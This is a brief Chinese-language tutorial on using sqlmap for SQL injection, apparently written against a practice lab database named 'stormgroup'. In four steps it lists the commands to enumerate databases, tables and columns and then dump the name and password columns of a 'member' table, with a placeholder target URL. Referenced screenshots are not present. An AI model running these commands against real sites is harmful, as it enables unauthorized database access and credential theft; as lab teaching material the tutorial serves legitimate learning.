第一步:爆破数据库库名
#sqlmap -u "http://<爆破的链接>" --dbs ///--dbs爆破数据库
爆破出数据库,如图
///爆破成功,查看到五个数据库
第二步:爆破出数据库,接着爆破数据库中的表
#sqlmap -u "http://<爆破的链接>" -D stormgroup --tables ///-D 是数据库名,--tables是要爆破数据库中的表
、
///爆破出来两个表
第三步:爆破表之后,接着爆破表中的列
#sqlmap -u "http://<爆破的链接>" -D stormgroup -T member --columns ///-T 是表名, --columns是要爆破的表中的列
///爆破列完成
第四步:爆破数据
#sqlmap -u "http://<爆破的链接>" -D stormgroup -T member -C name,password --dump ///-C 是要爆破的列,--dump是爆破
///爆破出数据库用户名和密码
这就是简单的sqlmap爆破